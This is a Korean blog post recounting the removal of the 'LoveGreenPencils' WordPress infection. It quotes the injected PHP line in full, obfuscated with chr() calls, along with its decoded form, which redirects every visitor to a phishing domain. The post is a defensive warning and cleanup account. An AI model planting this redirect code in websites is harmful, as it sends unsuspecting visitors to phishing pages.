와... 워드프레스 취약점 때문에 고생했다
LoveGreenPencils 라는 놈인데 최근에 변형된 형태로 돌아다니는것 같다
각종 php파일에
<?php $a="h"."ea"."der";$a(chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(105).chr(114).chr(99).chr(46).chr(108).chr(111).chr(118).chr(101).chr(103).chr(114).chr(101).chr(101).chr(110).chr(112).chr(101).chr(110).chr(99).chr(105).chr(108).chr(115).chr(46).chr(103).chr(97).chr(47).chr(53).chr(53).chr(114).chr(121).chr(101).chr(114).chr(121).chr(63).chr(105).chr(100).chr(61).chr(50).chr(50).chr(53).chr(56).chr(52).chr(38).chr(114).chr(115).chr(61).chr(50).chr(51).chr(52).chr(54));?>라는 내용을 써버리는데
사이트 접속 할때마다 이상한 피싱사이트로 redirect 시킨다..
처음에는 index.php 와 wp-stream.php제거 wp-blog-header.php 수정 하고 룰루랄라 페이지를 열었는데
그래도 여전히 redirect를 시켰다.
그래서 grep을 해봤다니................. 대략 300여개의 파일이 감염..................................
find와 sed를 이용해서 해당 문자열을 replace하고 나서야 겨우 멈췄지만 정말 어마무시한 놈이다
위에놈을 decode 하면 아래와 같다
$a="header";
$a("Location: https://irc.lovegreenpencils.ga/55ryery?id=22584&rs=2346");
잘 보인다 lovegreenpencils 나쁜놈................................
조심하고 또 조심하자 워드프레스
'관심거리' 카테고리의 다른 글
| 2021년 뉴질랜드 다시 코로나? (0) | 2021.02.17 |
|---|---|
| 뉴질랜드와 짜장면 (0) | 2021.02.02 |
| 뉴질랜드에서 비트코인하기 NZD로 비트코인 구매 (2) | 2020.12.04 |
| 코포 광고제거하기 (0) | 2020.11.24 |
| 워드프레스 우측 공간에 빈공간이 생기면 (0) | 2020.07.10 |
"이 포스팅은 쿠팡 파트너스 활동의 일환으로, 이에 따른 일정액의 수수료를 제공받습니다."